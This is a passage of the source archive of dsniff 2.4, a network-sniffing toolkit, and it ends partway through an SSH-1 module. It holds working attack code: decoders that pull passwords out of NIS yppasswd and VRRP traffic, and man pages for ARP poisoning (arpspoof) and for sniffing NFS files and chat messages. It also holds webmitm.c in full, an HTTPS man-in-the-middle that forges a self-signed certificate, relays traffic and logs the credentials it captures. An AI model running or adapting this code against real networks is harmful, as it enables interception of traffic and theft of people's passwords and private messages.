xdr_my_passwd(XDR *xdrs, struct my_passwd *objp) { if (xdr_string(xdrs, &objp->pw_name, ~0) && xdr_string(xdrs, &objp->pw_passwd, ~0) && xdr_int(xdrs, &objp->pw_uid) && xdr_int(xdrs, &objp->pw_gid) && xdr_string(xdrs, &objp->pw_gecos, ~0) && xdr_string(xdrs, &objp->pw_dir, ~0) && xdr_string(xdrs, &objp->pw_shell, ~0)) return (TRUE); return (FALSE); } static bool_t xdr_my_yppasswd(XDR *xdrs, struct my_yppasswd *objp) { if (xdr_string(xdrs, &objp->oldpass, ~0) && xdr_my_passwd(xdrs, &objp->newpw)) return (TRUE); return (FALSE); } int decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen) { struct rpc_msg msg; struct my_yppasswd yp; XDR xdrs; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); obuf[0] = '\0'; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == YPPASSWDPROG && msg.rm_call.cb_proc == YPPASSWDPROC_UPDATE) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); memset(&yp, 0, sizeof(yp)); if (xdr_my_yppasswd(&xdrs, &yp)) { snprintf(obuf, olen, "%s\n%s:%s:%d:%d:%s:%s:%s\n", yp.oldpass, yp.newpw.pw_name, yp.newpw.pw_passwd, yp.newpw.pw_uid, yp.newpw.pw_gid, yp.newpw.pw_gecos, yp.newpw.pw_dir, yp.newpw.pw_shell); } xdr_destroy(&xdrs); } return (strlen(obuf)); } int decode_ypserv(u_char *buf, int len, u_char *obuf, int olen) { struct rpc_msg msg; struct xid_map *xm; char *domain; bool_t status; XDR xdrs; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); obuf[0] = '\0'; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == YPPROG && msg.rm_call.cb_proc == YPPROC_DOMAIN) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); domain = NULL; if (xdr_string(&xdrs, &domain, YPMAXDOMAIN)) { if ((domain = strdup(domain)) != NULL) xid_map_enter(msg.rm_xid, YPPROG, YPVERS, YPPROC_DOMAIN, (void *) domain); } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_bool(&xdrs, &status)) { if (status == TRUE) snprintf(obuf, olen, "%s\n", (char *)xm->data); } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } return (strlen(obuf)); } dsniff-2.4/filesnarf.80000600000175000017500000000127307205670745014547 0ustar lucianoluciano.TH FILESNARF 8 .ad .fi .SH NAME filesnarf \- sniff files from NFS traffic .SH SYNOPSIS .na .nf .fi \fBfilesnarf\fR [\fB-i \fIinterface\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBfilesnarf\fR saves files sniffed from NFS traffic in the current working directory. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching files. .IP \fIpattern\fR Specify regular expression for filename matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), nfsd(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/arpspoof.80000600000175000017500000000160307210661057014414 0ustar lucianoluciano.TH ARPSPOOF 8 .ad .fi .SH NAME arpspoof \- intercept packets on a switched LAN .SH SYNOPSIS .na .nf .fi \fBarpspoof\fR [\fB-i \fIinterface\fR] [\fB-t \fItarget\fR] \fIhost\fR .SH DESCRIPTION .ad .fi \fBarpspoof\fR redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. .LP Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter(8)) must be turned on ahead of time. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to use. .IP "\fB-t \fItarget\fR" Specify a particular host to ARP poison (if not specified, all hosts on the LAN). .IP \fIhost\fR Specify the host you wish to intercept packets for (usually the local gateway). .SH "SEE ALSO" dsniff(8), fragrouter(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/pcaputil.c0000600000175000017500000000377607254077100014472 0ustar lucianoluciano/* * pcaputil.c * * Copyright (c) 2000 Dug Song * * $Id: pcaputil.c,v 1.2 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #ifdef BSD #include #endif #include "pcaputil.h" #ifdef BSD static int bpf_immediate(int fd, int on) { return (ioctl(fd, BIOCIMMEDIATE, &on)); } #endif int pcap_dloff(pcap_t *pd) { int offset = -1; switch (pcap_datalink(pd)) { case DLT_EN10MB: offset = 14; break; case DLT_IEEE802: offset = 22; break; case DLT_FDDI: offset = 21; break; #ifdef DLT_LOOP case DLT_LOOP: #endif case DLT_NULL: offset = 4; break; default: warnx("unsupported datalink type"); break; } return (offset); } pcap_t * pcap_init(char *intf, char *filter, int snaplen) { pcap_t *pd; u_int net, mask; struct bpf_program fcode; char ebuf[PCAP_ERRBUF_SIZE]; if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) { warnx("%s", ebuf); return (NULL); } if ((pd = pcap_open_live(intf, snaplen, 1, 512, ebuf)) == NULL) { warnx("%s", ebuf); return (NULL); } if (pcap_lookupnet(intf, &net, &mask, ebuf) == -1) { warnx("%s", ebuf); return (NULL); } if (pcap_compile(pd, &fcode, filter, 1, mask) < 0) { pcap_perror(pd, "pcap_compile"); return (NULL); } if (pcap_setfilter(pd, &fcode) == -1) { pcap_perror(pd, "pcap_compile"); return (NULL); } #ifdef BSD if (bpf_immediate(pd->fd, 1) < 0) { perror("ioctl"); return (NULL); } #endif return (pd); } /* from tcpdump util.c. */ char * copy_argv(char **argv) { char **p, *buf, *src, *dst; u_int len = 0; p = argv; if (*p == 0) return (0); while (*p) len += strlen(*p++) + 1; if ((buf = (char *)malloc(len)) == NULL) err(1, "copy_argv: malloc"); p = argv; dst = buf; while ((src = *p++) != NULL) { while ((*dst++ = *src++) != '\0') ; dst[-1] = ' '; } dst[-1] = '\0'; return (buf); } dsniff-2.4/msgsnarf.80000600000175000017500000000132607205667352014415 0ustar lucianoluciano.TH MSGSNARF 8 .ad .fi .SH NAME msgsnarf \- sniff chat messages .SH SYNOPSIS .na .nf .fi \fBmsgsnarf\fR [\fB-i \fIinterface\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBmsgsnarf\fR records selected messages from AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat sessions. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching messages. .IP \fIpattern\fR Specify regular expression for message matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/decode_vrrp.c0000600000175000017500000000301607254077077015145 0ustar lucianoluciano/* * decode_vrrp.c * * Virtual Router Redundancy Protocol. * * Copyright (c) 2000 Eric Jackson * Copyright (c) 2000 Dug Song * * $Id: decode_vrrp.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" struct vrrp_header { u_char vr_vers; /* Version */ u_char vr_vrid; /* Virtual Router ID */ u_char vr_prio; /* Router Priority */ u_char vr_naddr; /* # of addresses */ u_char vr_auth; /* Type of Authentication */ u_char vr_advr; /* ADVERTISEMENT Interval */ u_short vr_cksum; /* Checksum */ /* vr_naddr * 4 # of addresses */ }; #define VRRP_AUTH_NONE 0 #define VRRP_AUTH_SIMPLE 1 #define VRRP_AUTH_AH 2 #define VRRP_AUTH_DATA_LEN 8 int decode_vrrp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *b, inbuf, outbuf; struct vrrp_header *vrrp; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); vrrp = (struct vrrp_header *)buf_ptr(&inbuf); if (buf_len(&inbuf) < sizeof(*vrrp)) return (0); /* We only care about VRRP_AUTH_SIMPLE */ if (ntohs(vrrp->vr_auth) != VRRP_AUTH_SIMPLE) return (0); /* XXX - probably want to verify checksum */ /* Forward to Authentication Data */ buf_skip(&inbuf, sizeof(*vrrp) + 8 + (vrrp->vr_naddr * 4)); if ((b = buf_tok(&inbuf, NULL, VRRP_AUTH_DATA_LEN)) == NULL) return (0); buf_put(&outbuf, buf_ptr(b), buf_len(b)); buf_put(&outbuf, "\n", 1); buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/TODO0000600000175000017500000000060307212113312013145 0ustar lucianoluciano$Id: TODO,v 1.2 2000/12/02 06:29:30 dugsong Exp $ - finish conversion to buf interface - rework half-duplex tcp_raw reassembly, for *snarf [-c] - NTLM handling in telnet, FTP, HTTP, SMB, NNTP, etc. non-trivial since dsniff only examines client traffic :-/ - arpspoof [host ...] - more protocols: atalk, MAPI, etc.? - reverse more of AOL's OSCAR protocol for dsniff and msgsnarf dsniff-2.4/decode_hex.c0000600000175000017500000000226607254077073014742 0ustar lucianoluciano/* * decode_hex.c * * Hex dump, for debugging. * * Copyright (c) 2000 Dug Song * * $Id: decode_hex.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "buf.h" #include "decode.h" /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ int decode_hex(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_int i, j, k; u_char c; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while ((i = buf_len(&inbuf)) > 0) { i = i < 16 ? i : 16; k = buf_tell(&inbuf); buf_putf(&outbuf, " %04x: ", k); for (j = 0; j < i; j++) { buf_get(&inbuf, &c, 1); buf_putf(&outbuf, "%02x", (u_int)c); if ((j % 2) == 1) buf_put(&outbuf, " ", 1); } for (; j < 16; j++) { buf_put(&outbuf, " ", (j % 2) + 2); } buf_put(&outbuf, " ", 1); buf_seek(&inbuf, k, SEEK_SET); for (j = 0; j < i; j++) { buf_get(&inbuf, &c, 1); c = isprint(c) ? c : '.'; buf_putf(&outbuf, "%c", c); } buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/webmitm.c0000600000175000017500000002376007254620671014317 0ustar lucianoluciano/* * webmitm.c * * HTTP / HTTPS monkey-in-the-middle. * * Copyright (c) 2000 Dug Song * * $Id: webmitm.c,v 1.11 2001/03/17 08:35:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "record.h" #include "version.h" #define CERT_FILE "webmitm.crt" int Opt_quiet = 0; int Opt_debug = 0; int Opt_read = 0; int Opt_write = 0; int Opt_dns = 1; int http_fd, https_fd; int client_fd, server_fd; SSL_CTX *ssl_client_ctx, *ssl_server_ctx; SSL *ssl_client, *ssl_server; struct sockaddr_in csin, ssin; int do_ssl, sig_pipe[2]; in_addr_t static_host = 0; extern int decode_http(char *, int, char *, int); static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: webmitm [-d] [host]\n"); exit(1); } static void sig_chld(int signal) { if (write(sig_pipe[1], "x", 1) < 0) warn("sig_chld"); } static void sig_int(int signal) { close(http_fd); close(https_fd); record_close(); exit(0); } static void reap_child(void) { pid_t pid, status; while ((pid = waitpid(-1, &status, WNOHANG)) > 0) { if (Opt_debug) warnx("child %d terminated with status %d", pid, status); } } static void err_ssl(int eval, char *msg) { char buf[128]; ERR_error_string(ERR_get_error(), buf); err(eval, "%s", buf); } static void grep_passwords(char *buf, int len) { char obuf[1024]; if ((len = decode_http(buf, len, obuf, sizeof(obuf))) > 0) { record(csin.sin_addr.s_addr, ssin.sin_addr.s_addr, IPPROTO_TCP, ntohs(csin.sin_port), ntohs(ssin.sin_port), "http", obuf, len); } } static void cert_init(void) { struct stat sb; /* XXX - i am cheap and dirty */ if (stat(CERT_FILE, &sb) < 0) { if (system("openssl genrsa -out " CERT_FILE " 1024") != 0) err(1, "system"); if (system("openssl req -new -key " CERT_FILE " -out " CERT_FILE ".csr") != 0) err(1, "system"); if (system("openssl x509 -req -days 365 -in " CERT_FILE ".csr" " -signkey " CERT_FILE " -out " CERT_FILE ".new")) err(1, "system"); if (system("cat " CERT_FILE ".new >> " CERT_FILE) != 0) err(1, "system"); unlink(CERT_FILE ".new"); unlink(CERT_FILE ".csr"); warnx("certificate generated"); } } static void client_init(void) { if (fcntl(client_fd, F_SETFL, 0) < 0) err(1, "fcntl"); if (do_ssl) { ssl_client = SSL_new(ssl_client_ctx); SSL_set_fd(ssl_client, client_fd); if (SSL_accept(ssl_client) == 0) err_ssl(1, "SSL_accept"); } } static int client_read(char *buf, int size) { if (do_ssl) { return (SSL_read(ssl_client, buf, size)); } return (read(client_fd, buf, size)); } static int client_request(char *buf, int size) { struct buf *b, req; char *p; int i, reqlen; memset(&req, 0, sizeof(req)); req.base = buf; req.size = size; reqlen = 0; /* XXX - i feel cheap and dirty */ while ((i = client_read(req.base + req.end, req.size - req.end)) > 0) { req.end += i; if (reqlen && buf_len(&req) >= reqlen) { break; } else if ((i = buf_index(&req, "\r\n\r\n", 4)) > 0) { reqlen = i + 4; b = buf_tok(&req, NULL, reqlen); buf_rewind(&req); if ((i = buf_index(b, "\r\nContent-length: ", 18)) < 0) break; buf_skip(b, i + 18); b = buf_getword(b, "\r\n", 2); p = buf_strdup(b); buf_free(b); reqlen += atoi(p); free(p); } } reqlen = buf_len(&req); return (reqlen); } static int client_write(char *buf, int size) { if (do_ssl) { return (SSL_write(ssl_client, buf, size)); } return (write(client_fd, buf, size)); } static void client_close(void) { if (do_ssl) { SSL_free(ssl_client); } close(client_fd); } static void server_init(char *buf, int size) { struct buf *word, msg; char *vhost; int i; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = do_ssl ? htons(443) : htons(80); if (static_host == 0) { buf_init(&msg, buf, size); if ((i = buf_index(&msg, "\r\nHost: ", 8)) > 0) { buf_skip(&msg, i + 8); word = buf_tok(&msg, "\r\n", 2); vhost = buf_strdup(word); } else { i = buf_index(&msg, " http://", 8); if (i < 0 || i > 8) { errx(1, "no virtual host in request"); } buf_skip(&msg, i + 8); word = buf_tok(&msg, "/", 1); vhost = buf_strdup(word); } ssin.sin_addr.s_addr = libnet_name_resolve(vhost, 1); free(vhost); if (ssin.sin_addr.s_addr == ntohl(INADDR_LOOPBACK) || ssin.sin_addr.s_addr == -1) { errx(1, "couldn't resolve host in request"); } } else ssin.sin_addr.s_addr = static_host; if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) err(1, "socket"); if (connect(server_fd, (struct sockaddr *)&ssin, sizeof(ssin)) < 0) err(1, "connect"); if (do_ssl) { ssl_server_ctx = SSL_CTX_new(SSLv23_client_method()); ssl_server = SSL_new(ssl_server_ctx); SSL_set_connect_state(ssl_server); SSL_set_fd(ssl_server, server_fd); if (SSL_connect(ssl_server) < 0) err_ssl(1, "SSL_connect"); } } static int server_read(char *buf, int size) { if (do_ssl) { return (SSL_read(ssl_server, buf, size)); } return (read(server_fd, buf, size)); } static int server_write(char *buf, int size) { if (do_ssl) { return (SSL_write(ssl_server, buf, size)); } return (write(server_fd, buf, size)); } static void server_close(void) { if (do_ssl) { SSL_free(ssl_server); } close(server_fd); } static void mitm_init(void) { struct sockaddr_in sin; int i = 1; if (pipe(sig_pipe) < 0) err(1, "pipe"); if ((http_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0 || (https_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) err(1, "socket"); if (setsockopt(http_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) < 0 || setsockopt(https_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) < 0) err(1, "setsockopt"); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; sin.sin_port = htons(80); if (bind(http_fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) err(1, "bind"); sin.sin_port = htons(443); if (bind(https_fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) err(1, "bind"); if (listen(http_fd, 3) < 0 || listen(https_fd, 3) < 0) err(1, "listen"); SSL_library_init(); SSL_load_error_strings(); ssl_client_ctx = SSL_CTX_new(SSLv23_server_method()); if (SSL_CTX_use_certificate_file(ssl_client_ctx, CERT_FILE, SSL_FILETYPE_PEM) == 0) err_ssl(1, "SSL_CTX_use_certificate_file"); if (SSL_CTX_use_PrivateKey_file(ssl_client_ctx, CERT_FILE, SSL_FILETYPE_PEM) == 0) err_ssl(1, "SSL_CTX_use_PrivateKey_file"); if (SSL_CTX_check_private_key(ssl_client_ctx) == 0) err_ssl(1, "SSL_CTX_check_private_key"); } static void mitm_child(void) { u_char buf[8192]; fd_set fds; int i; if (Opt_debug) warnx("new connection from %s.%d", inet_ntoa(csin.sin_addr), ntohs(csin.sin_port)); client_init(); if ((i = client_request(buf, sizeof(buf))) < 0) err(1, "client_request"); if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(csin.sin_addr)); if (Opt_debug > 1) write(STDERR_FILENO, buf, i); server_init(buf, i); if (server_write(buf, i) != i) err(1, "server_write"); if (!Opt_quiet) grep_passwords(buf, i); for (;;) { FD_ZERO(&fds); FD_SET(client_fd, &fds); FD_SET(server_fd, &fds); i = MAX(client_fd, server_fd) + 1; if (select(i, &fds, 0, 0, 0) < 0) { if (errno != EINTR) break; } if (FD_ISSET(client_fd, &fds)) { i = sizeof(buf); if ((i = client_request(buf, i)) <= 0) break; if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(csin.sin_addr)); if (Opt_debug > 1) write(STDERR_FILENO, buf, i); if (server_write(buf, i) != i) break; if (!Opt_quiet) grep_passwords(buf, i); } else if (FD_ISSET(server_fd, &fds)) { i = sizeof(buf); if ((i = server_read(buf, i)) <= 0) break; if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(ssin.sin_addr)); if (Opt_debug > 2) write(STDERR_FILENO, buf, i); if (client_write(buf, i) != i) break; } else err(1, "select"); } server_close(); client_close(); } static void mitm_run(void) { fd_set fds; int i; signal(SIGCHLD, sig_chld); signal(SIGINT, sig_int); if (fcntl(sig_pipe[0], F_SETFL, O_NONBLOCK) < 0 || fcntl(sig_pipe[1], F_SETFL, O_NONBLOCK) < 0) err(1, "fcntl"); if (fcntl(http_fd, F_SETFL, O_NONBLOCK) < 0 || fcntl(https_fd, F_SETFL, O_NONBLOCK) < 0) err(1, "fcntl"); for (;;) { FD_ZERO(&fds); FD_SET(http_fd, &fds); FD_SET(https_fd, &fds); FD_SET(sig_pipe[0], &fds); i = MAX(http_fd, https_fd); i = MAX(sig_pipe[0], i); if (select(i + 1, &fds, 0, 0, 0) < 0) { if (errno != EINTR) err(1, "select"); } i = sizeof(csin); if (FD_ISSET(sig_pipe[0], &fds)) { while (read(sig_pipe[0], &i, 1) == 1) ; /* empty non-blocking pipe */ reap_child(); continue; } if (FD_ISSET(http_fd, &fds)) { client_fd = accept(http_fd, (struct sockaddr *)&csin, &i); do_ssl = 0; } else if (FD_ISSET(https_fd, &fds)) { client_fd = accept(https_fd, (struct sockaddr *)&csin, &i); do_ssl = 1; } else errx(1, "select failure"); if (client_fd < 0) { if (errno != EINTR && errno != EWOULDBLOCK) err(1, "accept"); } if (fork() == 0) { close(http_fd); mitm_child(); exit(0); } close(client_fd); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "dh?V")) != -1) { switch (c) { case 'd': Opt_debug++; break; default: usage(); } } argc -= optind; argv += optind; if (argc == 1) { if ((static_host = libnet_name_resolve(argv[0], 1)) == -1) usage(); } else if (argc != 0) usage(); record_init(NULL); cert_init(); mitm_init(); if (static_host == 0) { warnx("relaying transparently"); } else warnx("relaying to %s", argv[0]); mitm_run(); exit(0); } dsniff-2.4/ssh.h0000600000175000017500000000263207254077102013443 0ustar lucianoluciano/* * ssh.h * * Minimal SSH-1 protocol implementation. * * Copyright (c) 2000 Dug Song * * $Id: ssh.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef SSH_H #define SSH_H #define SSH_MAX_PADLEN 8 #define SSH_MAX_PKTLEN 262144 /* Authentication types. */ #define SSH_AUTH_PASSWORD 3 /* Cipher types. */ #define SSH_CIPHER_NONE 0 #define SSH_CIPHER_3DES 3 #define SSH_CIPHER_BLOWFISH 6 /* Message types. */ #define SSH_MSG_DISCONNECT 1 #define SSH_SMSG_PUBLIC_KEY 2 #define SSH_CMSG_SESSION_KEY 3 #define SSH_CMSG_USER 4 #define SSH_CMSG_AUTH_PASSWORD 9 #define SSH_SMSG_SUCCESS 14 #define SSH_SMSG_FAILURE 15 #define SSH_CMSG_STDIN_DATA 16 #define SSH_SMSG_STDOUT_DATA 17 #define SSH_SMSG_STDERR_DATA 18 #define SSH_SMSG_EXITSTATUS 20 typedef struct ssh_ctx { int authmask; int encmask; RSA *servkey; RSA *hostkey; } SSH_CTX; typedef struct ssh { int fd; SSH_CTX *ctx; u_char sesskey[32]; void *estate; void *dstate; void (*encrypt)(u_char *src, u_char *dst, int len, void *state); void (*decrypt)(u_char *src, u_char *dst, int len, void *state); } SSH; void SSH_init(void); SSH_CTX *SSH_CTX_new(void); SSH *SSH_new(SSH_CTX *ctx); void SSH_set_fd(SSH *ssh, int fd); int SSH_accept(SSH *ssh); int SSH_connect(SSH *ssh); int SSH_recv(SSH *ssh, u_char *buf, int size); int SSH_send(SSH *ssh, u_char *buf, int len); void SSH_close(SSH *ssh); #endif /* SSH_H */ dsniff-2.4/ssh.c0000600000175000017500000003400007254077100013426 0ustar lucianoluciano/* * ssh.c * * Minimal SSH-1 protocol implementation. * * Copyright (c) 2000 Dug Song * * $Id: ssh.c,v 1.6 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include "hex.h" #include "options.h" #include "sshcrypto.h" #include "ssh.h" static u_int crc32_tab[] = { 0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L, 0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L, 0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L, 0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL, 0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L, 0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L, 0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L, 0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL, 0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L, 0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL, 0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L, 0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L, 0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L, 0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL, 0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL, 0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L, 0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL, 0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L, 0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L, 0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L, 0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL, 0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L, 0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L, 0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL, 0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L, 0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L, 0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L, 0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L, 0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L, 0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL, 0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL, 0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L, 0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L, 0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL, 0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL, 0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L, 0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL, 0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L, 0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL, 0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L, 0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL, 0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L, 0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L, 0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL, 0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L, 0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L, 0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L, 0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L, 0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L, 0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L, 0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL, 0x2d02ef8dL }; static u_char pkt[4 + 8 + SSH_MAX_PKTLEN]; static void put_bn(BIGNUM *bn, u_char **pp) { short i; i = BN_num_bits(bn); PUTSHORT(i, *pp); *pp += BN_bn2bin(bn, *pp); } static void get_bn(BIGNUM *bn, u_char **pp, int *lenp) { short i; if (*lenp < 2) { errx(1, "short buffer"); } GETSHORT(i, *pp); *lenp -= 2; i = ((i + 7) / 8); if (*lenp < i) { errx(1, "short buffer"); } BN_bin2bn(*pp, i, bn); *pp += i; *lenp -= i; } static u_char * ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *servkey_n) { static u_char sessid[16]; u_int i, j; u_char *p; i = BN_num_bytes(hostkey_n); j = BN_num_bytes(servkey_n); if ((p = malloc(i + j + 8)) == NULL) return (NULL); /* XXX - conform to sshd implementation here, not RFC. */ BN_bn2bin(hostkey_n, p); BN_bn2bin(servkey_n, p + i); memcpy(p + i + j, cookie, 8); MD5(p, i + j + 8, sessid); free(p); return (sessid); } static u_int ssh_crc32(const unsigned char *p, u_int len) { u_int i; u_int val; val = 0; for (i = 0; i < len; i ++) { val = crc32_tab[(val ^ p[i]) & 0xff] ^ (val >> 8); } return (val); } static ssize_t atomicio(ssize_t (*f)(), int fd, void *_s, size_t n) { char *s = _s; ssize_t res, pos = 0; while (n > pos) { res = (f) (fd, s + pos, n - pos); switch (res) { case -1: if (errno == EINTR || errno == EAGAIN) continue; case 0: return (res); default: pos += res; } } return (pos); } void SSH_init(void) { SSL_library_init(); SSL_load_error_strings(); ERR_load_crypto_strings(); #ifndef BSD if (!RAND_status()) { RAND_seed("if you had a real operating system, " "you'd have a real kernel PRNG", 65); } #endif } SSH_CTX * SSH_CTX_new(void) { SSH_CTX *ctx; if ((ctx = calloc(sizeof(*ctx), 1)) == NULL) return (NULL); ctx->authmask = (1 << SSH_AUTH_PASSWORD); 